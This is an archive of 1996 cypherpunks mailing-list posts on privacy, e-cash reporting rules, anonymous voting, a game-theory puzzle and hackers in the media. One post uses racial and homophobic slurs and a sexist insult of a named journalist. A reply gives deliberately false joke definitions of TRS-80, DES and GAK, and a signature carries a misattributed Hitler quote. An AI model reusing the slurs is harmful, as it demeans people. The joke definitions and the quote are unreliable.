> Would digging up an embarrassing revelation about "our Nation or its people" 
> constitute "irreparable damage" sufficient to justify concluding that the 
> 1st amendment didn't apply?  Had the fact that we'd slaughtered Indians in 
> the late 1800's been kept secret until today, would its discovery and 
> publication be that "irreparable damage" that regulation could legitimately 
> seek to prohibit?  Would the news that the events leading up to the "Gulf of 
> Tonkin resolution" were a fraud cause "irreparable damage"?  Would finding 
> out the truth about the Watergate incident cause "irreparable damage"?    

Just recall how the government harassed the smithsonian institution 
for their plans to put togethrr an exhibition about bombing of japan.
i was profoundly disgusted (even though i am a militarist).


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shaun Clark <jacquard@teleport.com>
Date: Sat, 27 Jul 1996 17:17:45 +0800
To: cypherpunks@toad.com
Subject: Overwelmed with Stupidity...
Message-ID: <31F9C2BC.5458@teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, ok... Let me say something, but I don't want anyone to take this wrong. I'm not 
trying to be stupid, but I don't have half the knowledge you all seem to posses. For 
instance what the heck is a TRS-80, DES, or even GAK? I probabl;y know or have heard 
but, I'm not picking up on the three letter words. So, if you could help meout maybe I 
just might be able to start contributing activly to this mailer!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 27 Jul 1996 14:19:31 +0800
To: cypherpunks@toad.com
Subject: Re: Why the world needs privay protecting Ecash
Message-ID: <2.2.32.19960727041849.008b50f0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 PM 7/27/96 -0700, Timothy C. May wrote:

>If Alice uses her U.S. VISA card to make many cash withdrawals at ATMs in
>Zurich, Lichtenstein, Geneva, London, etc., are there any U.S. requirements
>that she obtain and fill out reports (in triplicate) on these transactions?
>Suppose the cumulative ATM transactions hit the magic $10,000 level?

It might be hard to get an ATM card that lets you take out $10,000/day.  I
suppose a VISA card or a Debit card might allow that amount.

Form 4790 Report of International Transportation of Currency or
Monetary Instruments available at:
ftp://ftp.fedworld.gov/pub/irs-pdf/f4790.pdf

Says:

A TRANSFER OF FUNDS THROUGH NORMAL BANKING PROCEDURES WHICH DOES NOT INVOLVE
THE PHYSICAL TRANSPORTATION OF CURRENCY OR MONETARY INSTRUMENTS IS NOT
REQUIRED TO BE REPORTED.

Form 4789 The Currency Transaction Report available at:
ftp://ftp.fedworld.gov/pub/irs-pdf/f4789.pdf 

Says:

"Currency.-The physical transfer of currency from one person to another.
This does not include a transfer of funds by means of bank check, bank
draft, wire transfer or other written order that does not involve the
physical transfer of currency."

I guess an ATM is a machine and not a person.  But these are the
instructions not the regs.

The form doesn't have to be filed by individuals only by financial
institutions. An ATM doesn't involve the bank giving you cash unless you are
using the ATM machine at your own bank.  I remember seeing some regs that
did mention ATM transfers but can't recall specifics.  Usually, they figure
that they have the "paper trail" anyway through your normal bank records. 

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@IO.COM>
Date: Sat, 27 Jul 1996 16:52:44 +0800
To: cypherpunks@toad.com
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
In-Reply-To: <199607270433.VAA28441@jobe.shell.portal.com>
Message-ID: <199607270629.BAA09515@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
> AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
> CAN TRACK YOU DOWN AND CLOSE THIS LIST.
> 

Troll.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 27 Jul 1996 18:35:25 +0800
To: Cyphergeeks <cypherpunks@toad.com>
Subject: Re: HACKER REPORT
In-Reply-To: <Pine.SUN.3.91.960726215253.16311A-100000@crl9.crl.com>
Message-ID: <Pine.GUL.3.95.960727013646.23006A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jul 1996, Sandy Sandfort wrote:

> At the end, Pete Wilson (the TV guy, not the governor) said
> something like, "Hackers tells us that the problem may be 
> overblown.  Most people--and this includes most hackers--

Really? Hackers are people?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jul 1996 18:33:01 +0800
To: cypherpunks@toad.com
Subject: Re: The Four Horsemen Go to the Olympics!
Message-ID: <199607270845.BAA17860@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 7/26/96 -0700, Alan Olsen <alano@teleport.com> wrote:
>Well, there was an explosion at the Olympics...  It may have been a bomb or
>it may have been a transformer.
>Expect this to be used as fuel as to why every one in America must be under
>constant survelance by the Government.
>The Four Horsemen are now an Olympic Event!

Yeah, it's been a wild week.  There was also an airplane hijacking
today, which ended peacefully.  The hijacker had a laptop wrapped
in tinfoil he was claiming was a bomb.*  And of course Clinton's
first speeches after the TWA crash were "we don't have any evidence
of terrorism yet but you'll all have to give up your civil liberties
so we can do a better job of protecting you."

----
*Penn Jillette proposed that a good boot-up program for laptops
and PDAs is one that displays a big timer counting backwards,
for use in airports that want to see that you've got a real laptop.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jul 1996 07:00:04 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <ae1e490a020210044324@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:46 PM 7/26/96, David Lesher wrote:
>>
>> >``Twenty cypherpunks robbed a bank.''
>> >        ^^^^^^^^^^^^^
>> >I was careful choosing words.
>>
>> That was my reaction as well.  I'd assume that if twenty cypherpunks
>> rob a bank, either it's one of Eric's party games (:-), or else
>> they probably conspired over the net to rob a bank by computer.
>
>
>Will they ALL fit in Tim May's hot tub?

This is _my_ game-theoretic solution to the puzzle: let the 20 robbers
battle it out, kill each other, whatever, then invite the survivors over
and get rid of them all, leaving me with the money.

Though I've had to delete most of the discussion of this puzzle, some
things come to mind:

1. Similarities with "the unexpected hanging" problem. (Briefly, a man is
told he will be hung in the next 20 days. But out of sensitivity to his
feelings, he will not be hung if he can predict that he'll be hung on the
*next day*. The man points out that he cannot be hung on the 20th day, as
if he was still alive on the 19th day, he'd know that the 20th day was the
day of the hanging. Hence, no hanging on the 20th day. So there are 19 days
left. But the same logic applies, and so on, backward. He says smugly "I
can't be hanged at all." So he is surprises when he is hanged on the 13th
day.)

2. Inadequate accounting for or weighting of the "costs" of being killed.
(I think others, including Jim Bell that I saw, mentioned this.) An
abstract game theory problem is often hard to find a stable solution for,
and is all the more difficult when the stakes are so high and yet are
treated "abstractly."

3. The _iterated_ (repeated) form should have different results.


I initially dismissed the posed problem, but the dozens of responses
suggest that folks *do* find this stuff interesting.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sat, 27 Jul 1996 03:31:48 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607261359.GAA05920@jobe.shell.portal.com>
Message-ID: <199607261531.DAA12535@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


Hal <hfinney@shell.portal.com> wrote:

   Of course, #1 could have offered some money to #3 and gotten his vote,
   but that would violate the terms of the problem: #1 wants to make as
   much money as possible.  And since he can get #3's vote even while
   offering nothing to him, that is what he will do.

It was a much more interesting question before the addition of this
"clarification," IMO.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Kin, n.:
	An affliction of the blood




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 27 Jul 1996 21:08:52 +0800
To: cypherpunks@toad.com
Subject: Re: HACKER REPORT
Message-ID: <2.2.32.19960727110434.006e366c@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain




>Just saw part I of a two-part series on "hackers" being broadcast
>by a local San Francisco TV station.  Nothing horrible, in my
>opinion.  The adroitly sidestepped the hacker/cracker distinction
>by saying the "hacker" has come to mean..." and then gave the
>negative, intrusive definition.

Did somebody record this, and if so, could I send you a tape
so you can copy it for me?
Thanks... //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jul 1996 08:21:15 +0800
To: cypherpunks@toad.com
Subject: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
Message-ID: <ae1e61d70302100416ec@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:40 PM 7/26/96, Bill Frantz wrote:
>At  9:09 AM 7/26/96 -0700, Timothy C. May wrote:
>>... I hate the term "nerd," as I hate the
>>names "dweeb," "geek," "jerk," etc. Believe me, anyone who thinks being
>>called a "nerd" is complimentary, or anyone who labels himself as a "geek,"
>>is probably one who would call himself a "nigger," or a "queer.")
>
>I must disagree with Tim on this issue.  Back in the dark ages, before the
>revolution, the Yankee was an insult used by British sympathisers to
>describe the hick American revolutionaries.  The Americans adopted it as a
>matter of pride and threw it back in their detractors face.

I think Bill and I must've been in an exchange on this before, as I recall
similar words from someone, perhaps Bill.

Look, anyone is perfectly free to wear t-shirts espousing "Wimp Pride" and
saying "We're gimps, we're wimps, we're dweebs, and we're PROUD!"

I just cringe when I meet young programmers at Cypherpunks who mumble "I'm
just a computer geek." Fine, I write them off as geeks.

>Homosexuals are doing the same thing with the them "queer".  When I went to
>Dan Farmer and Wietse Venema's class in Internet Security, Dan taught the
>class wearing a tank-top which said "QUEER" across the front.

I have no problem with dykes, fags, fairies, queens, and other assorted
queers and perverts "reclaiming" these terms...I'll just ignore such folks.
(And I do find it passing strange that several of these "queers" expressed
outrage to me that I used the word "queer" in the name of a thread; I guess
it's the same way niggers insist that only _they_ are allowed to use this
"reclaimed" word.)

>People with pride in themselves and what they do can make their detractors
>eat their insults.  We should make it clear that "nerd," "dweeb," "geek,"
>"jerk," etc. are where the money is.  We should turn them into terms of
>pride in what we are and what we do.

Maybe it's a generational thing (though Bill is as old as me, I think), but
terms of insult are just that. The biggest users seem to be clueless
journalists, like blonde bimbette Sue Hutchinson of the "S.J. Mercury
News," who writes repeatedly of "nerdfests," and "geek conventions." (Hey,
maybe womyn need to reclaim the terms "bimbo" and "airhead"?)

As I see it, the best way to handle such terms of insult is to refuse to
respond to it, not some bullshitty scheme of "reclaiming" the term. (A
journalist once called me to get a "nerd's" perspective on a crypto
issue--I told her I'm not a nerd and hung up on her.)

As for what people ought to call themselves, e.g., when journalists ask
what they are. just what is wrong with "engineer," "programmer,"
"scientist," and "cryptographer"?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 27 Jul 1996 14:51:40 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
In-Reply-To: <199607270013.TAA07369@manifold.algebra.com>
Message-ID: <Pine.LNX.3.94.960727044904.2031A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Jul 1996, Igor Chudov @ home wrote:

> Date: Fri, 26 Jul 1996 19:13:19 -0500 (CDT)
> From: "Igor Chudov @ home" <ichudov@algebra.com>
> To: "Timothy C. May" <tcmay@got.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
> 
> Timothy C. May wrote:
> > 
> > I just cringe when I meet young programmers at Cypherpunks who mumble "I'm
> > just a computer geek." Fine, I write them off as geeks.
> > 
> 
> OK, I am a foreigner. Can anyone explain me what the word "geek" means
> and what are the origins of this word? I thought it was a cool word,
> meaning someone orthogonal to the present world but being able to 
> change it.
> 
> 	- Igor.
> 

Ummm... its usually functionally equivalent to "nerd" -- a complete
social outcast thats really smart, or at least appears to be.

 --Deviant
        "Uncle Cosmo ... why do they call this a word processor?"
        "It's simple, Skyler ... you've seen what food processors do to food,
right?"
                -- MacNelley, "Shoe"


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfmgCjAJap8fyDMVAQHqpQf/UMogPnVpjUgZKGO63mnSoOxgi829a+oj
2bzm1cOcJQtRGqSpHhjRKoV66h3LvOkYgx2hn+t3b6iA32UOO6SQ9HlucPsGKQVf
2E3GMrE94Numi6HC6J1FSSzFmmhRAxzMGbNav/VDgbEzufvAHpLKCEGpsnQ8VT6+
vJ08y7RPz6u/hFw51QZCMAW10Dfq1HZYwRidPCWooH8ynbEV7T6pXg+qiU8Ogpjh
T4eaA8M2fY9uzj85fE124zztwoV8PB+MlLSw4+LyFxshyZtUiN4eQT6SdDJrUOHX
Qw7RatH014JTC3UZO7b8DjyjXpMqnfOOgQTCuYxUS6eqjqlLFpqb5A==
=IeDx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jul 1996 07:00:30 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Produce 7 Hertz Frequency
Message-ID: <ae1e710504021004a833@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:26 PM 7/26/96, The Deviant wrote:

>> What does "sin" have to do with the number 7? Oh, you must mean the movie
>> "Se7en," in which the Se7en deadly sins were central to the plot. I get it.
>> The seven deadly sins are the seven deadly hurts.
>>
>
>Gee... or mabey he's refering to "sin" as the common abreviation of "sine"
>as in "sine wave".
>
> --Deviant

???

I suggest some people on this list are losing track of the English language.

Get a clue.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jul 1996 08:20:59 +0800
To: cypherpunks@toad.com
Subject: Re: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <199607272208.PAA08644@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 7/25/96 EST, jbugden@smtplink.alis.ca wrote:
> Basically, in this view of rights and raising of children it would seem that a
> relativistic pragmatism prevails. Personally, I think that the two choices are
> either this relative pragmatism or an absolute morality.

The fact that someone is doing something that is morally wrong, does
not automatically give us the right to go and rectify it at gunpoint.

Not all wrongs are crimes, only those wrongs for which is just to
engage in violent retribution.

> Some implications of Tim's view is that all our rights are basically a
> transitory agreement between individuals.

Tim may or may not believe this, but that is not a consequence of his
views.  The schelling point theory of rights is substantially equivalent
in practice to "We hold these truths to be self evident."


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 27 Jul 1996 20:25:08 +0800
To: cypherpunks@toad.com
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
Message-ID: <m0uk6ao-00039lC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 7/26/96 -0700, anonymous-remailer@shell.portal.com wrote:
>I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
>AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
>CAN TRACK YOU DOWN AND CLOSE THIS LIST.
>
I find this rather comical. I think I'll add this to my web-site. Maybe then
the FBI will close it down. :-)
==========================================
   Blake Wehlage <jwilk@iglou.com>
   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
 Goto: http://members.iglou.com/jwilk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 27 Jul 1996 23:49:55 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: HACKER REPORT
In-Reply-To: <Pine.GUL.3.95.960727013646.23006A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960727065146.22646C-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 27 Jul 1996, Rich Graves wrote:

> On Fri, 26 Jul 1996, Sandy Sandfort wrote:
> 
> > At the end, Pete Wilson (the TV guy, not the governor) said
> > something like, "Hackers tells us that the problem may be 
> > overblown.  Most people--and this includes most hackers--
> 
> Really? Hackers are people?

MOST hackers.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 27 Jul 1996 22:15:29 +0800
To: cypherpunks@toad.com
Subject: EFFector Online 09.09: Mo
Message-ID: <TCPSMTP.16.7.27.8.9.24.2645935021.656646@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> "The Singapore government isn't interested in controlling information,
 In> but wants a gradual phase-in of services to protect ourselves. It's
 In> not to control, but to protect the citizens of Singapore. In our
 In> society, you can state your views, but they have to be correct."
 In> - Ernie Hai, coordinator of the Singapore Government Internet

 This was in the latest Effector Online...


 P.J.
 pjn@nworks.com


... Answers: $1, Short: $5, Correct: $25, dumb looks are still free.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 27 Jul 1996 22:27:27 +0800
To: cypherpunks@toad.com
Subject: One of the biggest proble
Message-ID: <TCPSMTP.16.7.27.8.9.30.2645935021.656647@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> What our biggest problem is, is that people want the

     What our biggest problem is is people like you.
     And that is a hell of a rant for a person with
     too few balls to use a "normal" E-Mail acct.


 P.J.
 pjn@nworks.com


... Can not read right brain:  <A>bort <R>etry <F>rolic

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 27 Jul 1996 22:22:18 +0800
To: cypherpunks@toad.com
Subject: Re: Distributed DES crack
Message-ID: <TCPSMTP.16.7.27.8.9.42.2645935021.656649@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> Has anyone thought of asking RSA, etc, for help? If DES falls (so to
 In> speak) it yould make thare product more desirable.

 Hmmm... Damn good idea.

 P.J.
 pjn@nworks.com



... Captian's log, stardate 25970-point-5.  I am nailed to the hull.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Jul 1996 01:12:53 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: The Four Horsemen Go to the Olympics!
Message-ID: <199607271514.IAA08581@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:43 AM 7/27/96 -0700, Bill Stewart wrote:
>Yeah, it's been a wild week.  There was also an airplane hijacking
>today, which ended peacefully. 

The "funny" part of it, for those who remember the spate of hijackings in 
the early 70's, is that he hijacked a Cuba-bound airliner...to Miami!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <jkenth@c2.org>
Date: Sun, 28 Jul 1996 01:38:20 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Anonymous Web Services Inc.
In-Reply-To: <199607262255.PAA22798@slack.lne.com>
Message-ID: <Pine.SUN.3.94.960727084016.14965A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jul 1996, Eric Murray wrote:

> J. Kent Hastings writes:... 
> > I figure the digicrime site for provocateurs.
>  
> Um guys, it's a joke...Check out the rest of the digicrime home page...

Oh yeah, empty links. It's a trap,  I tells ya!

Kent





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Sun, 28 Jul 1996 02:00:13 +0800
To: cypherpunks@toad.com
Subject: Publicly Verifiable Anonymous Voting System
Message-ID: <199607271553.IAA28911@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[Begin Rant]
As I write this, I am listening to the news coverage of the bombing in 
Centennial Park.  The ABC news reports are already linking the suspected Georgia 
Militia members accused of plotting to use pipe bombs at the Olympic Games.  
Just like OKC, the militia-gun owner-right-wing extremist smear is gearing up 
before the blood has a chance to dry.  On the other hand, the govt seems to be 
awfully reluctant to admit the obvious about TWA 800...
[End Rant]

Here is the how the voting system works.

1.  All voting information (public keys, ballots, ballot signatures, etc.) is 
publicly available via a Web site or other similar means, and can be downloaded 
in its entirety by anyone who cares to take the trouble to do so.  The software 
(and source code) used to generate ballots should be publicly available as well.

2.  When someone registers to vote, they submit a RSA public key to a registered 
voter key database.  The public key database does not contain voter information; 
only keys.  Access to the key entry terminals is controlled, so that only 
registered voters can submit keys.  A receipt is given to the voter with a hash 
of the key printed on it (PGP fingerprint style), the key entry clerk's name,  a 
receipt serial number, etc., so the voter can verify the correct key was put in 
the system, and who to shoot if it wasn't.

3.  On election day, each voter submits a ballot signed with their private key. 
The ballot contains the fingerprint of the voter's public key, the voter's 
choices, (preferably in a standardized ASCII format) and the digital signature. 
The ballot goes into the vote database regardless of whether it is valid or not. 
The voter receives a printed receipt confirming that the ballot was entered in 
the database, with a hash of the entire ballot (headers, signature, and all), 
receipt serial number, etc.

4.  After the election, each voter can verify whether their public key and 
ballot are in the database, and see whether their vote is deemed valid or not 
(if the signature on the ballot can be verified by a key in the key database). 
If there are any discrepancies, the voter has the public key, the ballot, and 
the receipts to prove that his vote should be counted.

5.  Since the key/vote databases are not connected to individuals, no one can 
connect votes to voters unless cheating occurs during the registration process. 
If there is fraud or other errors, the key/ballot/receipt combo is all that is 
necessary to prove the error--no identification of the bearer is required.

6.  Keys in the system should expire every few years.

Any comments / constructive criticisms welcome.

Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Sun, 28 Jul 1996 00:15:28 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
Message-ID: <199607271407.JAA09592@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 7/26/96 -0700, you wrote:
>I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
>AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
>CAN TRACK YOU DOWN AND CLOSE THIS LIST.
>
I'm not. Yet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Sun, 28 Jul 1996 02:35:44 +0800
To: cypherpunks@toad.com
Subject: Re: HACKER REPORT
Message-ID: <199607271621.JAA04860@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jul 1996, Sandy Sandfort <sandfort@crl.com> wrote:
[snip]
>On Sat, 27 Jul 1996, Rich Graves wrote:
>
>> On Fri, 26 Jul 1996, Sandy Sandfort wrote:
>> 
>> > At the end, Pete Wilson (the TV guy, not the governor) said
>> > something like, "Hackers tells us that the problem may be 
>> > overblown.  Most people--and this includes most hackers--
>> 
>> Really? Hackers are people?
>
>MOST hackers.
[snip]

The rest, of course, are chupa-cabras, yeti, descendants of the Roswell crash 
survivors, and ATF agents...

Jonathan Wienke





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 27 Jul 1996 23:40:46 +0800
To: cypherpunks@toad.com
Subject: Re: Why the world needs privay protecting Ecash
Message-ID: <2.2.32.19960727132151.008b7140@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 7/27/96 -0700, Timothy C. May wrote:
>Who said it had to be in one day? I didn't. Most vacations to Europe last a
>couple of weeks, e.g., "If this is Tuesday, I need to make a withdrawal in
>Milano."

The original definition of multiple transactions (structuring) said the
transactions had to occur within one day.  There is now a separate rule that
says that the bank has to report *any* suspicious transactions even if they
don't fall under specific regulations.  Keep the population guessing as to
what's reportable.

>I think a lot of ATMs will now dispense big chunks of cash--I've never
>checked on limits, but I notice that some CRT screens now have chunks up to
>$600 or so listed.

New York money center banks allow $1000 a day or so.  Credit cards (which
are also bank accounts although most don't think of them as such) let more
get out and one can always over pay one's credit card to get a credit
balance of any amount.  They take the money.  Usually in those cases, you
can withdraw the credit limit each day and then when the account settles
overnight it draws down the credit balance you've built up and your
available credit is back.  Some may do this "live" one would have to
experiment.  

ATM and credit cards may also have different limits for point-of-sale
transactions than for cash withdrawals.

>Thanks. Still not sure if it applies, but I'd forgotten that it's up to the
>banks to do the reports; good to know it's not up to me.

You have to report taking cash (currency or monetary instruments) into or
out of the country but you don't have to rat on yourself for cash
transactions with a bank here.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 28 Jul 1996 02:26:56 +0800
To: cypherpunks@toad.com
Subject: Re: Overwelmed with Stupidity...
In-Reply-To: <31F9C2BC.5458@teleport.com>
Message-ID: <199607271623.JAA07683@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Shaun Clark <jacquard@teleport.com> writes:

 > Ok, ok... Let me say something, but I don't want anyone to
 > take this wrong. I'm not trying to be stupid, but I don't
 > have half the knowledge you all seem to posses.

That's ok.  Welcome to the list.

 > For instance what the heck is a TRS-80, DES, or even GAK? I
 > probabl;y know or have heard but, I'm not picking up on the
 > three letter words. So, if you could help meout maybe I just
 > might be able to start contributing activly to this mailer!

TRS stands for "Technical Report Series." These are put out
periodically by the computer science departments of major
universities.  TRS-80 is a monograph titled - "The Sternlight
Effect: The Application of Nonlinear Matched Filters to the
Reduction of Additive Gaussian Noise in Usenet Articles."

DES stands for "Diethylstilbestrol", a synthetic estrogen given
to women at high risk for miscarriage in the 1950's.  Its use was
discontinued when the daughters of those who took it were
discovered to have a high incidence of vaginal and cervical
adenocarcinomas.  Male offspring suffered no life-threatening
health problems from prenatal DES exposure, but were often
afflicted with TWS. (Teeny Weeny Syndrome)

And finally, GAK is the name for the green slime frequently seen
to cover people on Nickelodeon, the childrens' cable channel.  It
is prepared from a variety of non-toxic ingredients in the
Nickelodeon kitchens, and supposedly is safe to ingest, should
one feel motivated to do so.

Now that you know the secret Three Letter Abbreviations, you are
an official Cypherpunk.  Congratulations.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
